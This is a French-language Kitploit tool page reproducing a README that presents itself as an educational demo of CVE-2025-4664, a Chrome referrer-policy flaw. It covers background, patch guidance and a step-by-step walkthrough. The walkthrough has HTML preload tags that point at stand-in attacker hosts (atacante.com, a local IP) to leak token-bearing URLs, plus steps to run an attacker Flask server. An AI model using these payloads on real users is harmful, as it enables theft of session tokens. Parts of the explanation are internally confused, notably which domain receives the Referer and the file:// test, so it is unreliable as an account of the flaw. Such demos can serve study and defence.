Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/speinador/cve-2025-4664
Analyse des VulnérabilitésExploitationCollecte d'InformationsHameçonnageSécurité WebApprentissage et Éducation
GitHubspeinador/cve-2025-4664

CVE-2025-4664

Voir le dépôt
4il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Démonstration pédagogique de la CVE-2025-4664, une vulnérabilité du chargeur Chrome permettant une fuite de données inter-origines via la manipulation de la politique de référent (referrer-policy). Inclut une page HTML victime et un serveur Flask attaquant pour une simulation pratique d'exploitation.

Partager

🔒 Vulnérabilité CVE-2025-4664

La vulnérabilité CVE-2025-4664 est un défaut de sécurité de haute gravité identifié dans le composant Loader de Google Chrome, présent dans les versions antérieures à la 136.0.7103.113. Ce problème permet à un attaquant distant de filtrer des données d'origine croisée via une page HTML spécialement conçue, ce qui peut compromettre des informations sensibles telles que des jetons de session ou des identifiants d'authentification.


❓ En quoi consiste la vulnérabilité ?

Le défaut réside dans une implémentation inappropriée des politiques de sécurité dans le composant Loader de Chrome. Plus précisément, Chrome interprète la directive referrer-policy dans l'en-tête HTTP Link pour les requêtes de sous-ressources (comme les images ou les scripts), même lorsque d'autres navigateurs ne le font pas. Un attaquant peut en tirer parti en configurant une politique moins restrictive, comme unsafe-url, ce qui amène Chrome à divulguer des URL complètes, y compris des paramètres sensibles, à des domaines contrôlés par l'attaquant.


⚠️ Impact et exploitation active

Cette vulnérabilité a été activement exploitée dans des environnements réels, ce qui a conduit l'Agence de cybersécurité et de sécurité des infrastructures des États-Unis (CISA) à l'inclure dans son Catalogue des vulnérabilités connues et exploitées (KEV). La CISA a fixé au 5 juin 2025 la date limite pour que les agences fédérales appliquent les correctifs correspondants.


🛡️ Atténuation et recommandations

Google a publié des mises à jour pour corriger cette vulnérabilité dans les versions suivantes :

  • 🖥️ Windows et Mac : 136.0.7103.113/.114
  • 🐧 Linux : 136.0.7103.113

Il est fortement recommandé à tous les utilisateurs de mettre à jour leur navigateur Chrome vers la version la plus récente disponible. Pour vérifier et appliquer la mise à jour :

  1. 🔍 Ouvrez Chrome et cliquez sur le menu à trois points dans le coin supérieur droit.
  2. ⚙️ Sélectionnez « Aide », puis « À propos de Google Chrome ».
  3. ⬇️ Chrome recherchera automatiquement les mises à jour et les installera si elles sont disponibles.
  4. 🔄 Après la mise à jour, redémarrez le navigateur pour appliquer les changements.

De plus, les utilisateurs de navigateurs basés sur Chromium, comme Microsoft Edge, Brave, Opera et Vivaldi, doivent être attentifs aux mises à jour correspondantes, car ils pourraient être affectés par cette vulnérabilité.

Maintenir le navigateur à jour est essentiel pour se protéger contre les menaces de sécurité actives et sauvegarder les informations personnelles.


🕵️‍♂️ Comment est-elle exploitée ?

La vulnérabilité CVE-2025-4664 est exploitée en manipulant la manière dont Google Chrome gère la politique de referrer (referrer-policy) lors du chargement de sous-ressources (comme les images, les scripts, etc.) depuis des liens HTML.


⚙️ Comment elle est exploitée techniquement :

  1. 🌐 Création d'un site malveillant :
    L'attaquant crée un site web qui inclut un lien HTML comme celui-ci dans son en-tête HTTP :

    root@kitploit:~
    <link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
    
  2. 🔧 Manipulation de referrer-policy : Dans la plupart des navigateurs, cet attribut referrerpolicy dans la balise ne s'applique pas à la ressource chargée. Cependant, Chrome l'applique, ce qui est au cœur du problème.

  3. 📤 Fuite du Referer : Lorsque le navigateur de la victime (Chrome) charge la ressource depuis victima.com, il envoie l'URL complète du site d'origine comme en-tête Referer, ce qui peut inclure :

  • Jetons de session (?token=ABC123)
  • Paramètres sensibles (?user=admin&password=1234)
  • URL privées
  1. 🎯 Réception sur le serveur de l'attaquant : L'attaquant peut placer comme destination de la ressource une URL sous son contrôle, par exemple :
root@kitploit:~
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">
  1. 🕵️ Vol d'informations : Le serveur de l'attaquant enregistre les en-têtes HTTP et obtient le contenu complet de l'URL de la victime. Cela peut inclure des données confidentielles, des jetons d'accès ou même des URL d'API internes.

✔️ Conditions nécessaires pour que cela fonctionne :

  • 👤 La victime utilise un Google Chrome non patché.
  • 🔑 Le site de la victime inclut des informations sensibles dans l'URL (comme des jetons d'authentification).
  • 🎣 L'attaquant parvient à faire charger une ressource depuis son domaine par le navigateur de la victime (par exemple, via du phishing, une publicité malveillante ou une redirection).

🧪 Exemple pratique de l'attaque (simplifiée) :

1- L'attaquant envoie à la victime un lien vers :

root@kitploit:~
https://atacante.com/pagina-maliciosa.html
  1. Sur cette page, quelque chose comme ceci est chargé :
root@kitploit:~
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
  1. Le navigateur Chrome envoie :
root@kitploit:~
Referer: https://victima.com/perfil?token=ABC123

au domaine de l'attaquant, exposant le jeton.

Photo de profil

Fichiers du projet

🖥️ index.html — Fichier victime

Ce fichier simule la victime de l'attaque ; c'est une démo HTML simplifiée pour montrer comment la vulnérabilité CVE-2025-4664 peut être exploitée à l'aide d'une balise malveillante :

  • Représente l'interface vulnérable.
  • Sert à démontrer comment la vulnérabilité fonctionne dans un environnement contrôlé.
  • Contient des éléments que l'attaquant peut exploiter selon CVE-2025-4664.
root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Este recurso apunta a un sitio de la víctima con información sensible en la URL -->
  <link rel="preload" as="image"
        href="https://victima.com/perfil?token=ABC123"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
  <p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>

Que fait ce code :

  • La balise est configurée pour précharger une image depuis victima.com avec un jeton dans l'URL.
  • Avec referrerpolicy="unsafe-url", Chrome enverra toute l'URL de la page actuelle comme Referer au domaine victime.
  • Un attaquant peut capturer cette URL complète dans ses journaux si l'image pointe vers son propre serveur.

🐍 servidor_atacante.py — Fichier attaquant

Avec ce script, il est possible d'automatiser l'attaque pour capturer les Referer à l'aide d'un petit serveur en Python. Voici un exemple utilisant Flask pour simuler le serveur de l'attaquant qui reçoit les données :

  • Simule l'attaque contre la victime représentée par index.html.
  • Implémente les techniques décrites dans la vulnérabilité.
  • Sert à tester et valider l'atténuation implémentée.

Comment l'utiliser :

  1. Enregistrez ce code sous le nom servidor_atacante.py.
  2. Installez Flask si vous ne l'avez pas :
root@kitploit:~
pip install flask
  1. Exécutez le serveur :
root@kitploit:~
python servidor_atacante.py
  1. Modifiez ensuite la démo HTML ainsi :
root@kitploit:~
<link rel="preload" as="image"
      href="http://<tu_IP>:8080/captura.jpg"
      referrerpolicy="unsafe-url">

Remplacez <tu_IP> par l'IP publique ou locale du serveur qui exécute le script.


💪 Comment utiliser le projet

🛠️ 1. Exécuter le serveur Flask

  1. Ouvrez un terminal (PowerShell ou CMD).

  2. Naviguez vers le dossier du fichier :

root@kitploit:~
cd "C:\Users\Sebas\Desktop\servidor_atacante"
  1. Exécutez Flask :
root@kitploit:~
python servidor_atacante.py
  1. Vous verrez quelque chose comme :
root@kitploit:~
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080

🌐 2. Créer et ouvrir index.html (simulation de la victime)

Dans ce même dossier (C:\Users\Sebas\Desktop\servidor_atacante), créez un fichier nommé index.html avec ce contenu :

root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Simula el ataque -->
  <link rel="preload" as="image"
        href="http://192.168.1.35:8080/captura.jpg"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Simulación CVE-2025-4664</h1>
  <p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>

✅ Important : Assurez-vous que l'IP (192.168.1.35) corresponde à celle que Flask affiche comme IP locale. Si elle est différente, modifiez-la dans le HTML.

🚀 3. Ouvrir index.html avec un paramètre sensible

  1. Ouvrez Chrome.

  2. Dans la barre d'adresse, saisissez :

root@kitploit:~
file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
  1. Appuyez sur Entrée.

  2. 📥 Voir le résultat sur le serveur Dans la console de Flask, vous devriez voir quelque chose comme :

root@kitploit:~
[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123

[Carpeta destino] : Modifiez ce paramètre selon l'endroit où vous avez enregistré le fichier.

🎯 Cela signifie que le navigateur a envoyé le Referer complet à l'attaquant !


🧑‍🏫 Auteur

Explication réalisée par Sebastian Peinador à des fins pédagogiques et de recherche en cybersécurité offensive.


📄 Licence

Ce matériel est distribué sous la licence MIT.

Si cela vous est utile, n'oubliez pas de mettre ⭐ au dépôt ou de le partager !

Télécharger l’outil